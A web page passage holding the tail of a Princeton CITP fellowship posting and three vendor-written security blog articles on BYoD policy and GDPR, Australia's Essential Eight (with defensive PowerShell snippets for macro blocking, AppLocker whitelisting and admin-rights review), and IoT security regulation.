An IT Policy Researcher will have Princeton University as the primary affiliation during the visit to CITP (for example, a postdoctoral researcher or a professional visiting for a year between jobs). The successful applicant must possess a Ph.D. or equivalent and typically will be appointed to a 12-month term, beginning September 1st.

This year we are also looking for a postdoctoral fellow to work on bias in AI in collaboration with an interdisciplinary team: Arvind Narayanan and Olga Russakovsky at Princeton and Kate Crawford at the AI Now Institute at NYU. We are interested in developing techniques for recognizing, mitigating and governing bias in computer vision and other modern areas of AI that are characterized by massive datasets and complex, deep models. If you are interested specifically in this opening, please mention it in your cover letter.

Full consideration for the IT Policy Researcher positions is given to those who apply by the end of December for the upcoming year.

Apply here to become an IT Policy Researcher


Applicants should apply to either the Visiting IT Policy Fellow position (if they will be on leave from a full-time position) or the IT Policy Researcher position (if not), but not both positions; applicants to either position may also apply to be the Microsoft Visiting Research Scholar/Professor if they hold a Ph.D.

All applicants should submit a current curriculum vitae, a research plan (including a description of potential courses to be taught if applying for the visiting professor), and a cover letter describing background, interest in the program, and any funding support for the visit. References are not required until finalists are notified. CITP has secured limited resources from a range of sources to support visitors. However, many of our visitors are on paid sabbatical from their own institutions or otherwise provide some or all of their own outside funding.

Princeton University is an Equal Opportunity/Affirmative Action Employer and all qualified applicants will receive consideration for employment without regard to age, race, color, religion, sex, sexual orientation, gender identity or expression, national origin, disability status, protected veteran status, or any other characteristic protected by law.

All offers and appointments are subject to review and approval by the Dean of the Faculty.


If you have any questions about any of these positions or the application process, please feel free to contact us at *protected email*

Securing the BYoD Workplace

Letting employees’ personal phones, tablets and laptops loose within your corporate network does not sound like a good idea. But that doesn’t mean you can avoid it.

BYoD, or Bring Your Own Device, refers to a policy which governs employees using company networks and data on personal devices. IT staff are often wary of such policies, but management tend to like them as they allow for a more streamlined workflow and a reduction in the sizeable cost of buying and maintaining IT equipment.

Only 49 percent of UK organizations have installed formal BYoD policies, according to SailPoint’s most recent market survey. Of course, this doesn’t mean that employees are not using company networks with their own devices; it merely means there’s no policy to manage and control that process.

Fears around BYoD are not unfounded. Phishing links, bad intentions and everything in between reinforce the old cliché that humans are the weakest part of any organization. It is entirely understandable why an organization would be afraid of allowing an employee’s device, along with its applications and data, onto a corporate network. Still, if you want a secure organization, employees are also a critical part of the solution.

Those fears are not doing anything to stop an increasingly mobile workforce nor the fact that network perimeters are quickly moving out of view.

A draconian ban on personal devices won’t halt their use any more than an unhinged allowance of personal devices will deal with threats to your network. Both extremes are childish options for a modern company and should be flatly ignored. A sensible middle way means both accepting the reality of personal devices in the enterprise environment and crafting strategies to enable this new functionality, while shielding yourself from the threats it brings. It means getting a policy in place to handle this new reality.

So what do you need to think about when coming up with a BYoD policy?

How you’re going to protect your critical data assets from mistakes, insiders and criminals is entirely dependent on what those critical data assets are. Design cars? Then you’ll need to protect intellectual property going in and out of your organization. Sales teams will want to protect client lists, and healthcare bodies will need to keep all manner of healthcare records under lock and key. Your first task should be to identify your critical data assets and decide on a hygienic way to handle them on personal and corporate devices.

This matters for compliance too. Your BYoD policy will have to be structured around the specific regulatory obligations of your industry. But there is one particular regulation which everyone will have to prepare for: The General Data Protection Regulation.

In the run-up to the enforcement of GDPR on May 25th 2018, some have started to view BYoD policies with suspicion. A survey from Strategy Analytics last year showed increasing fears around BYoD on the part of European businesses. Ten percent of those polled said they expected the use of BYoD-enabled tablets to decrease with the advent of the GDPR.

Creating a structure for the use of home devices within an organization, some may think, opens it up to compromise when it comes to compliance. After all, what’s to stop anyone from loading up their personal laptop with all the personal data they can get their hands on and making for the door?

A good BYoD policy for one.

The GDPR demands that you actively take account of the personal data that you hold and how it might be threatened, before implementing security controls and policies “appropriate to the risk.”

Aside from the personal data that might be handled by employees, you also have to account for the personal data that might be accessed on their personal devices.

Attached to those demands are fines of up to four percent of global turnover, or 20 million euros, whichever is higher. Given those figures, BYoD is an issue which you can no longer ignore.

The good news is there are a number of areas in which a good BYoD policy can ease your path to GDPR compliance. The landmark piece of regulation includes requirements about access control and breach reporting as well as the protection of personal information. A BYoD policy will help in all these areas.

You’ll need to demonstrate your compliance to regulators too, meaning that you will need to have documented policies, audits and reports that show you have an active BYoD policy.

Once you’ve thought through your compliance obligations, you’ll want to think about how you secure your network and data on personal devices. This is known as Enterprise Mobility Management.

For example, being able to remotely monitor and manage mobile sessions in the office or over secure SSL VPNs when users are out of the office is core to secure BYoD.

This matters for the everyday flow of data between personal devices and corporate networks just as much as it does for the actual physical mobility of those devices. Even in a world without hackers, users would still lose and damage their devices. It’s important then that critical data is still in your hands even when the device is not.

Organizations should encrypt corporate data and consider solutions that allow you to reach in to a lost device and remotely wipe it of sensitive data, keeping it out of attackers’ hands even if it isn’t in yours. Remote wipe technology can be a point of contention, considering you’re also dealing with the device owner’s data.

It’s also worth considering how this fits into your offboarding processes. Similar solutions can make sure that leaving employees don’t also leave with critical data and, even more importantly, access to corporate accounts.

Even for current employees it might make sense to adopt the Principle of Least Privilege as a guiding reference. It states, simply, that people must be given only the rights and privileges they need to do their job. If an employee does not need access to a particular area or piece of data, then they should not have it. The proliferation of admin rights on corporate networks is still a leading cause of data breaches, and privileged credentials, according to analyst firm Forrester, are misused in 80 percent of attacks. You will want to lock down access as a matter of priority.

Container security solutions can help you separate out your employees’ devices from their potentially hazardous personal data and apps. When using their device for company business, they can work inside a ‘corporate container’ which insulates both corporate and personal environments from risks to privacy and security.

Technological solutions like container security, SSL VPNs and network access controls are critical and can take a lot of the danger potential out of your users’ hands. Still, humans will always be your first line of defence when it comes to security; they are where a good deal of your effort has to be focused. Staff must be rigorously educated on what they can and cannot do while using company networks, trained on proper onboarding and offboarding processes, and updated on the best practices of cyber hygiene.

This process should ultimately be collaborative. Staff should be asked what they need, and how BYoD implementation would best fit them. Any security policy has to be tailored around those who are wearing it, or it will tear.

Users will have to be able to access the information and apps they need and easily reconfigure their devices so they can work safely on a corporate network. If they can’t, they will find workarounds which breach your security.

Gartner has predicted that 20 percent of BYoD programs will fail due to over-complexity. To that end, low-friction solutions are always the best choice when it comes to user-facing security; a solution that accommodates users is less likely to be violated and more likely to result in a more secure network that works in harmony with its staff.

BYoD will introduce a variety of unknown quantities to a network, posing a challenge to anyone who is trying to secure that network. But today’s workplace demands the kind of flexibility that BYoD brings and ignoring that fact won’t make it go away. A secure organization rises to meet the challenges posed by BYoD instead of letting them fly overhead.

About the author: Scott Gordon is the chief marketing officer at Pulse Secure, responsible for global marketing strategy, communications, operations, channel and sales enablement. He possesses over 20 years’ experience contributing to security management, network, endpoint and data security, and risk assessment technologies at innovative startups and large organizations across SaaS, hardware and enterprise software platforms.


Cyber Security Lessons from Abroad – Australia’s Essential Eight

Cyber risk affects businesses all over the world, so it’s no surprise that countries have developed their own individual mitigation strategies to help combat this threat. But businesses can apply many of these strategies to their organisations to improve their overall cyber security posture, regardless of the geography that they are operating in.

A good example is the Essential Eight, created by the Defence Signals Directorate, the cyber security arm of the Australian Department of Defence (DoD). Designed to prevent the spread of malware, limit the extent of security incidents and support data recovery, the Essential Eight is a collection of best-practice recommendations that businesses can use to bolster their security protocols against attacks online.

The Essential Eight recommends the following actions to prevent malware from executing:

  • Application whitelisting: Creating a list of approved applications that are authorised to run within a system, automatically turning off untrusted operations.
  • Patching applications: Frequent security updates and patches to applications can prevent known vulnerabilities from causing problems, boosting overall cyber defences.
  • Disabling untrusted Microsoft Office macros: Disabling untrusted macros can prevent attackers from using them to download and run malware – a growing threat (a registry sketch follows these lists).
  • Application hardening: Uninstalling, or at least blocking access to, Adobe Flash Player, along with blocking untrusted Java code, can help prevent data and applications from being manipulated.

And the following to limit the impact of a breach and aid data recovery:

  • Backing up data on a daily basis: Regularly backing up data can ensure that important information can be restored quickly and efficiently in a worst-case scenario.
  • Patching operating systems: Operating systems can fall victim to vulnerabilities if they are not regularly patched. 
  • Restricting administrative privileges: Users should only be granted access to the data and applications that are crucial for the role that they are performing, and only those who handle tasks like system management or software installation should be granted these privileges.
  • Multi-factor authentication: Where user access to data or systems is subject to multiple forms of identification, such as entry of a unique code, passwords, fingerprint scans or other biometric data.
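For the macro recommendation above, the setting ultimately lands in the registry, so it can be audited or enforced per user with a few lines. The paths below assume the Office 2016/365 policy layout and should be verified against the Office build in use; at scale this is normally delivered through group policy:

  # Illustrative sketch: enforce 'disable all macros without notification' for Word.
  # Registry locations assume Office 2016/365 policy keys -- verify for your build.
  $key = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security'
  New-Item -Path $key -Force | Out-Null
  Set-ItemProperty -Path $key -Name 'VBAWarnings' -Value 4 -Type DWord
  # Also block macros in files downloaded from the internet (Office 2016 and later):
  Set-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord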

Used concurrently, these rules can help businesses prevent and mitigate the potential impact of cyber attacks. Importantly, the DoD proactively updates the guidelines to keep pace with the ever-evolving cyber threat, ensuring that they remain applicable both now and in the future.

Although each of these measures plays an important role in helping organisations identify vulnerable assets and set appropriate defences for their networks and applications, two specific steps of the Essential Eight stand out from the rest: whitelisting applications and restricting administrative privileges.

Application whitelisting

By creating a list of applications that are pre-authorised to be used on devices within a system, organisations can alleviate the potential risk of malware infecting a device, since operations that aren’t contained within the list will automatically be turned off.

Application whitelisting can be particularly useful when deployed by the users who are most likely to be the victim of a cyber attack, such as senior management, system administrators or those who have access to more sensitive data – often those who work in HR or finance departments. 

Enforcing application whitelisting across a company can seem like a daunting task, but for high-risk users the benefits far outweigh the time and effort required.

To execute application whitelisting, businesses should:

  1. Pinpoint the applications that are necessary for everyday operations and authorise these to be used across all systems.
  2. Implement a framework and rules to guarantee that only those applications which are on the pre-approved list can be executed (see the sketch after this list).
  3. Maintain and update this framework regularly by using a change management programme.
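A minimal sketch of steps 1 and 2 using AppLocker (available in Windows Enterprise editions); the directory is a placeholder, and generated rules should be piloted in audit mode before enforcement:

  # Illustrative sketch: build allow rules from the contents of a trusted directory
  # and apply them to the local policy. Enforcement requires the Application
  # Identity service to be running; run this from an elevated session.
  Get-AppLockerFileInformation -Directory 'C:\Program Files' -Recurse -FileType Exe, Script |
      New-AppLockerPolicy -RuleType Publisher, Hash -User Everyone -Xml |
      Out-File '.\whitelist-policy.xml'

  # Review the generated XML and test in audit mode before applying:
  Set-AppLockerPolicy -XmlPolicy '.\whitelist-policy.xml'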

Application whitelisting should not replace any antivirus or security software that is already being used within an organisation. Instead, it should complement this software by protecting data and lessening the number of vulnerabilities that may be present within the system.

Restricting administrative privileges

In addition to whitelisting, organisations can better secure their networks by restricting admin privileges solely to those who need the ability to change parts of a network or computer system. 

Company-wide admin privileges may be seen as a way of increasing user flexibility, since each individual is able to adapt their devices to suit their own needs, adding applications and changing settings as they please. 

But if this activity is left unsupervised, malicious attackers can more easily infiltrate and infect entire systems by compromising just one device, potentially causing catastrophe across a network. 

Removing this privilege from users who do not need it can bolster network security by eliminating this potential vulnerability. It can also create a more stable network environment, making problems easier to identify and fix, since only a limited number of users will be able to circumvent security settings and make changes to the system. 

Restricting admin privileges can be done by:

  1. Identifying which tasks require admin privileges.
  2. Authorising users for whom admin privileges are necessary.
  3. Creating separate accounts for those users who need admin privileges, whilst ensuring that they only have the admin privileges necessary for their roles.
  4. Regularly reviewing which accounts have access to admin privileges, updating and removing users and privileges when appropriate (a short sketch follows this list).
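Step 4 is easy to script on Windows endpoints with the built-in LocalAccounts cmdlets; a minimal sketch (group and account names are examples):

  # Illustrative sketch: review who holds local admin rights, then remove an
  # account that no longer needs them (Windows, LocalAccounts module).
  Get-LocalGroupMember -Group 'Administrators'
  Remove-LocalGroupMember -Group 'Administrators' -Member 'CONTOSO\jsmith'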

To further improve the effectiveness of removing admin privileges, those who have access to these accounts should be prevented from accessing programs which could pose a potential cyber security risk, such as web browsers or email applications. Separate accounts should always be created for these tasks. 

By following the guidance laid out in Australia’s Essential Eight, and by focusing particularly on application whitelisting and admin right restrictions, global organisations can better mitigate the risk and impact of cyber attacks. 

About the author: Kevin Alexandra is principal technical consultant in Avecto’s Boston office, where he acts as senior escalation engineer for all Avecto Defendpoint deals in North America. Kevin is also a technical account manager providing dedicated one-to-one support to a multi-national consumer goods corporation operating Avecto’s solution.


Will We Get a GDPR for the IoT?

The General Data Protection Regulation (GDPR) breaks new ground when it comes to privacy law. After years of hidden breaches, stolen identities and negligent data handling, organizations will finally be forced to get serious about data privacy.

Data loss incidents that are due to non-compliance can draw fines that run as high as four percent of global turnover, or 20 million euros, whichever is higher. This will prove a threat to some, but for others, it will finally put the weight behind personal data protection that has been lacking for so long.

But there is still no specific regulation for the relentlessly growing, and fatally insecure IoT. In 2017, the European Union Agency for Network and Information Security (ENISA) found that there were no “legal guidelines for IoT device and service trust.” Nor any “level zero defined for the security and privacy of connected and smart devices.”

Today’s smart workforce is bringing personal devices into the workplace in an effort to get the job done faster. Manufacturers are building connected intelligence into their products to make them stickier and more purposeful. This massive small-business and consumer adoption of connected devices has unfortunately left most manufacturers in the front seat offering features and interoperability, but with security exposures buried in the trunk.

IoT is a market that doesn’t show any signs of slowing down. IDC predicts that there will be 200 billion connected devices by 2020, and if standards stay the same that could mean billions of security vulnerabilities. The Mirai malware demonstrated how IoT devices with default settings can be vulnerable to infection, and it has been used in DDoS attacks. More malicious variants are underway, such as those that now aim to target ARC processors embedded into a broad array of Linux-based devices.

As such, it might then be a good idea to imbue IoT security with the kind of weight that the GDPR gives personal data. But why hasn’t that happened yet?

The GDPR does not have much that directly confronts the problems of the IoT. It regulates the use of personal data as it pertains to the IoT, but it never calls the problem by its name. For example, the GDPR holds you accountable for your security vulnerabilities and for making sure that third parties and personal-data-handling assets are also GDPR compliant. This includes IoT devices, but those specific concerns are diluted among a mix of other security considerations.

Regulation is often slow. The last piece of EU data protection regulation came in 1995. Since then we’ve seen the massive exponential growth of cross-border data flows, the inexorable rise of cybercrime, and the appearance of multiple computing devices and high-speed internet connections in European homes. The GDPR, for example, was first proposed in January 2012, and it took over four years before it was adopted by the European Parliament.

The point here is that regulation can be slow to deal with change. First, lawmakers have to get wind of a problem, begin to understand it and then meticulously draft lengthy documents embattled by bureaucratic hurdles, legal considerations and competing interests.

The GDPR holds supranational legitimacy over 28 separate countries and applies not only to bodies which are based in those countries but also to those which have customers within them. Considering the EU is still the world’s largest market, this makes the GDPR not just a European regulation but a global one. Unless national regulators can make foreign manufacturers do what they say, regulation on IoT security will be hard to achieve. International supply chains will prove a particular problem, as many IoT devices are manufactured in countries prized for their low regulatory barriers, which allows retailers to bring in the cheap smart devices that consumers and small businesses crave.

There are some signs of movement toward IoT security regulation. In April 2017, the Californian state government introduced legislation for IoT security, and the French government is eyeing proposals to make IoT manufacturers liable for the security of their products. There is a great desire to introduce regulations of this kind among a number of sectors, public and private.

Until then, it behooves the industry to establish a commercial IoT security testing standard and share best practices for IoT risk mitigation. For example, ICSA Labs, an ISO-accredited, independent, third-party tester, has published an IoT testing framework. Likewise, enterprises have leveraged network access control (NAC) technology to fortify IoT defences, enforce policies for unsanctioned IoT device use, and mitigate the risk of malware proliferation, network exposure, and sensitive data leakage. Educating the consumer and enterprise markets on IoT security threats and safeguards is equally important.

About the author: Scott Gordon is the chief marketing officer at Pulse Secure, responsible for global marketing strategy, communications, operations, channel and sales enablement. He possesses over 20 years’ experience contributing to security management, network, endpoint and data security, and risk assessment technologies at innovative startups and large organizations across SaaS, hardware and enterprise software platforms.
